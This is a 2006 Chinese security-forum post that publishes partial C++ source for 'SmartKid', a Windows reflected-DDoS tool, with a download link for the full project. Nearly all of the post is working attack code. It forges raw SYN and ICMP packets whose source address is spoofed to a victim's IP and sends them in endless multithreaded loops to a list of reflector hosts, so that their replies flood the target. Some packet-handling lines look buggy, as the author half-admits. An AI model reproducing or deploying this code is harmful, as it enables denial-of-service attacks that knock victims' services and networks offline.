xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加文章 Xcon English Version

智慧小子SmartKid drdos循环反射部分源代码


创建时间:2006-11-23
文章属性:原创
文章提交:swords (songbohr_at_163.com)

项目名称:智慧小子SmartKid

有了成果要公开, 不要舍不得,不然很快会过时的。。。:)
ICMP部分包构造感觉有问题,希望能得到反馈意见。

下载地址:http://www.dream2fly.net/projects/smartkid.rar
介绍地址:http://www.dream2fly.net/projects.php

#include "StdAfx.h"
#include "drdos.h"
#include <Afxmt.h>         //多线程头文件


CDrdos::CDrdos(void)
{
}

CDrdos::~CDrdos(void)
{
}

std::vector<CString> g_reflectlist;
static const int SleepTimes=10;     ///<休眠时间0.01s
static CCriticalSection Tlock;     ///<关键区

static SOCKET     sock;
static SOCKADDR_IN syn_in;
static SOCKADDR_IN icmp_in;

static IP_HEADER   ipheader;
static TCP_HEADER tcpheader;
static ICMP_HEADER icmpheader;
static PSD_HEADER psdheader;

void CDrdos::InitSynPacket(const u_long &target_ip, const u_short &target_port)
{
  //填充IP首部
  ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
  ipheader.tos=0;
  ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
  ipheader.ident=1;
  ipheader.frag_and_flags=0x40;
  ipheader.ttl=255;   //最大
  ipheader.proto=IPPROTO_TCP;
  ipheader.checksum=0;
  ipheader.sourceIP=htonl(target_ip);
  ipheader.destIP=htonl(target_ip);

  //填充Tcp首部
  tcpheader.th_dport=htons(target_port);
  tcpheader.th_sport=htons(target_port);
  tcpheader.th_seq=htonl(rand());
  tcpheader.th_ack=0;
  tcpheader.th_lenres=(sizeof(TCP_HEADER)/4<<4|0);
  tcpheader.th_flag=2; //syn 00000010 修改这里来实现不同的标志位探测,2是SYN,1是FIN,16是ACK探测
  tcpheader.th_win=htons(512);
  tcpheader.th_urp=0;
  tcpheader.th_sum=0;

  //填充TCP伪首部用来计算TCP头部的效验和
  psdheader.saddr=ipheader.sourceIP;
  psdheader.daddr=ipheader.destIP;
  psdheader.mbz=0;
  psdheader.ptcl=IPPROTO_TCP;
  psdheader.tcpl=htons(sizeof(TCP_HEADER));
}

void CDrdos::InitIcmpPacket(const u_long &target_ip, const u_short &target_port)
{
  //填充IP首部
  ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
  ipheader.tos=0;
  ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER));
  ipheader.ident=1;
  ipheader.frag_and_flags=0x40;
  ipheader.ttl=255;   //最大
  ipheader.proto=IPPROTO_ICMP;
  ipheader.checksum=0;
  ipheader.sourceIP=htonl(target_ip);
  ipheader.destIP=htonl(target_ip);

  //填充ICMP首部
  icmpheader.ih_type=8;
  icmpheader.ih_code=0;
  icmpheader.ih_cksum=0;
  icmpheader.ih_id=(USHORT)GetCurrentProcessId();
  icmpheader.ih_seq=htons(u_short(rand()));
  icmpheader.ih_timestamp=htonl(GetTickCount());
}

DWORD CDrdos::syn_drdosthread(LPVOID param)
{
  DWORD dwResult=0;
  
  CString reflect_ip_port;
  u_long reflect_ip;
  u_short reflect_port;

  int randnum=0;
  while(true)
  {
    Tlock.Lock();
    for(std::vector<CString>::const_iterator iter=g_reflectlist.begin();iter!=g_reflectlist.end();++iter)
    {
        reflect_ip_port=*iter;
        int index=reflect_ip_port.Find (":",0);
        char *zombies_ip=new char[20];
        memcpy(zombies_ip,reflect_ip_port,index);
        zombies_ip[index]=0;
        if( (reflect_ip=inet_addr(zombies_ip)) == INADDR_NONE)
        {
          delete []zombies_ip;
          continue;   //跳过无效IP地址
        }
        delete []zombies_ip;
        reflect_port= atoi(reflect_ip_port.Right(reflect_ip_port.GetLength() - index - 1));

        if(randnum==2006)
        {
          randnum=0;
        }
        else
        {
          ++randnum;
        }
        u_long seq_num = MakeRand32(randnum);

        ipheader.destIP=reflect_ip;
        ipheader.ident = rand();
        ipheader.checksum = 0;

        tcpheader.th_dport = htons(reflect_port);
        tcpheader.th_seq = htonl(seq_num);
        tcpheader.th_sum = 0;

        psdheader.daddr = ipheader.destIP;

        //计算校验和
        char SendBuff[128]={0};

        //计算TCP校验和
        memcpy(SendBuff, &psdheader, sizeof(PSD_HEADER));
        memcpy(SendBuff+sizeof(PSD_HEADER), &tcpheader, sizeof(TCP_HEADER));
        tcpheader.th_sum=checksum((u_short *)SendBuff,sizeof(PSD_HEADER)+sizeof(TCP_HEADER));

        /////////
        //计算IP检验和
        memcpy(SendBuff, &ipheader, sizeof(IP_HEADER));
        memcpy(SendBuff+sizeof(IP_HEADER), &tcpheader, sizeof(TCP_HEADER));
        memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER),0,4);
        ipheader.checksum=checksum((u_short *)SendBuff,sizeof(IP_HEADER));

        syn_in.sin_family = AF_INET;
        syn_in.sin_addr.s_addr = reflect_ip;
        syn_in.sin_port = htons(reflect_port);

        //发送数据包
        int ret=sendto(sock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, (struct sockaddr*)&syn_in, sizeof(syn_in));
        if(ret==SOCKET_ERROR)
        {
          CString err;
          err.Format("错误号:%d\n\n请到http://www.dream2fly.net/forum提交这个错误号!\n\n您提交的意见将会在下版本中改进。",WSAGetLastError());
          MessageBox(NULL,err,"wrong",MB_OK);
          return WSAGetLastError();   //XP sp2下raw socket send() 10004 Error,xp sp2下不支持raw socket
        }
    }
    Tlock.Unlock();
  }  

  return dwResult;
}

DWORD CDrdos::icmp_drdosthread(LPVOID param)
{
  DWORD dwResult=0;

  //Tlock.Lock();
  CString reflect_ip_port;
  u_long reflect_ip;
  u_short reflect_port;
  //Tlock.Unlock();

  int randnum=0;
  while(true)
  {
    for(std::vector<CString>::const_iterator iter=g_reflectlist.begin();iter!=g_reflectlist.end();++iter)
    {
        reflect_ip_port=*iter;
        int index=reflect_ip_port.Find (":",0);
        char *zombies_ip=new char[20];
        memcpy(zombies_ip,reflect_ip_port,index);
        zombies_ip[index]=0;
        if( (reflect_ip=inet_addr(zombies_ip)) == INADDR_NONE)
        {
          delete []zombies_ip;
          continue;   //跳过无效IP地址
        }
        delete []zombies_ip;
        reflect_port= atoi(reflect_ip_port.Right(reflect_ip_port.GetLength() - index - 1));

        if(randnum==2006)
        {
          randnum=0;
        }
        else
        {
          ++randnum;
        }
        u_short seq_num = MakeRand16(randnum);

        ipheader.destIP = reflect_ip;
        ipheader.ident = rand();
        ipheader.checksum = 0;

        icmpheader.ih_cksum=0;
        icmpheader.ih_id=(USHORT)GetCurrentProcessId();
        icmpheader.ih_seq=htons(seq_num);
        icmpheader.ih_timestamp=htonl(GetTickCount());

        //计算ICMP校验和
        icmpheader.ih_cksum=checksum((u_short *)&icmpheader,sizeof(ICMP_HEADER));

        char SendBuff[128]={0};
        //计算IP检验和
        memcpy(SendBuff, &ipheader, sizeof(IP_HEADER));
        memcpy(SendBuff+sizeof(IP_HEADER), &icmpheader, sizeof(ICMP_HEADER));
        ipheader.checksum=checksum((u_short *)SendBuff,sizeof(IP_HEADER));

        icmp_in.sin_family = AF_INET;
        icmp_in.sin_addr.s_addr =reflect_ip;
        icmp_in.sin_port = htons(reflect_port);


        //发送数据包
        int ret=sendto(sock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, (struct sockaddr*)&icmp_in, sizeof(icmp_in));
        if(ret==SOCKET_ERROR)
        {
          CString err;
          err.Format("错误号:%d\n\n请到http://www.dream2fly.net/forum提交这个错误号和您的操作系统版本!\n\n您提交的意见将会在下版本中改进。",WSAGetLastError());
          MessageBox(NULL,err,"wrong",MB_OK);
          return WSAGetLastError();   //XP sp2下raw socket send() 10004 Error,xp sp2下不支持raw socket
        }
    }  
  }

  return dwResult;
}

void CDrdos::start(const int threadnum,const link_type drdostype,const u_long &target_ip,const u_short &target_port,const std::vector<CString> &reflect_list)
{
  m_threadnum=threadnum;
  g_reflectlist=reflect_list;
  //sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
  sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
  if(sock ==INVALID_SOCKET)
  {
    MessageBox(NULL,"Init wrong!!submit bug?Go To http:///www.dream2fly.net !","wrong",MB_OK);
    return;
  }

  BOOL flag=true;
  int ret=setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag));
  checkerror(ret,"IP_HDRINCL");

  int nTimeOut =2000;//2s
  ret=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&nTimeOut,sizeof(nTimeOut));
  checkerror(ret,"SO_SNDTIMEO");
  ret=setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeOut,sizeof(nTimeOut));
  checkerror(ret,"SO_SNDTIMEO");
  switch(drdostype)
  {
  case _SYN:
    {
        //开始初始化数据包
        InitSynPacket(target_ip,target_port);
        break;
    }
  case _ICMP:
    {
        //开始初始化数据包
        InitIcmpPacket(target_ip,target_port);
        break;
    }
  default:
    {
        //开始初始化数据包
        InitSynPacket(target_ip,target_port);
        break;;
    }
  }

  DWORD thread_ID=1;
  HANDLE *hDrdosThread =new HANDLE[m_threadnum];
  switch(drdostype)
  {
  case _SYN:
    {
        for(int i=0;i!=m_threadnum;++i)
        {
          hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)syn_drdosthread,NULL,0,&thread_ID);
          if(hDrdosThread==NULL)
          {
            MessageBox(NULL,"CreateThread error!","Error",MB_OK);
          }
          Sleep(SleepTimes);
          ++thread_ID;    
        }
        break;
    }
  case _ICMP:
    {
        for(int i=0;i!=m_threadnum;++i)
        {
          hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)icmp_drdosthread,NULL,0,&thread_ID);
          if(hDrdosThread==NULL)
          {
            MessageBox(NULL,"CreateThread error!","Error",MB_OK);
          }
          Sleep(SleepTimes);
          ++thread_ID;  
        }
        break;
    }
  default:
    {
        for(int i=0;i!=m_threadnum;++i)  
        {
          hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)syn_drdosthread,NULL,0,&thread_ID);
          if(hDrdosThread==NULL)
          {
            MessageBox(NULL,"CreateThread error!","Error",MB_OK);
          }
          Sleep(SleepTimes);
          ++thread_ID;    
        }
        break;
    }
  }

  DWORD WaitThread = WaitForMultipleObjects( m_threadnum , hDrdosThread , TRUE , INFINITE );
  if( WaitThread != WAIT_FAILED)
  {
    for( int n = 0 ; n != m_threadnum; ++n )
    {
        CloseHandle( hDrdosThread[n] );
    }
  }
  //关闭套接口
  closesocket(sock);
}